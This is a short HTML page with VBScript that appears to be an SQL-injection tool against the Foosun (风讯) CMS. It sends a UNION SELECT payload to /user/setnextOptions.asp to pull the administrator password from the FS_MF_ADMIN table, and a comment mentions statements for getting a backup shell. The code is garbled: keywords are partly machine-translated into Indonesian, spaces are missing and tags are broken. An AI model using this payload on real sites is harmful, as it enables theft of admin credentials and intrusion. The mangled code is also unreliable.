<ScriptLanguage = "vbscript">
Subwindow_onload
Window.Resizeto450.380
window.moveto300.300
Endsub
</script>
<ScriptLanguage = "vbscript">
FunctionGetHttppage (path)
t = getbody (jalur)
getHttppage = bytestoBstr (t, "gb2312")
document.geteLementById ("url"). Innertext = getHttppage
Fungsi endfungsi
</script>
<ScriptLanguage = "vbscript">
FunctionGody (URL)
OnerrorresumeNext
SetRetrieval = createObject ("microsoft.xmlhttp")
Tanpa retrieval
.Open "get", url, false, "", ""
.Mengirim
Getbody = .responseBody
Endwith
SetRetrieval = tidak ada
Fungsi endfungsi
FunctionByTestObstr (body, cset)
Dimobjstream
Setobjstream = createObject ("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.writeBody
objstream.position = 0
objstream.type = 2
objstream.charset = cset
BytestoBstr = objstream.readtext
objstream.close
Setobjstream = tidak ada
Fungsi endfungsi
</script>
<title> bylcx </iteme>
<inputId = "urlcode" name = "urlcode" size = "60" value = "http: // 风讯 url/user/setnextOptions.asp">
<selectid = "sql" name = "sql" onchange = vbs: getHttppage (document.geteLementById ("urlcode"). value+document.geteLementById ("sql"). value)>
<optionValue = ""> 风讯 SQL 版注入 , 至于其它备份 shell 的语句懒得写了 </pection>
<optionvalue="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20 dari%20FS_MF_ADMIN%20-where%20id = 1-")")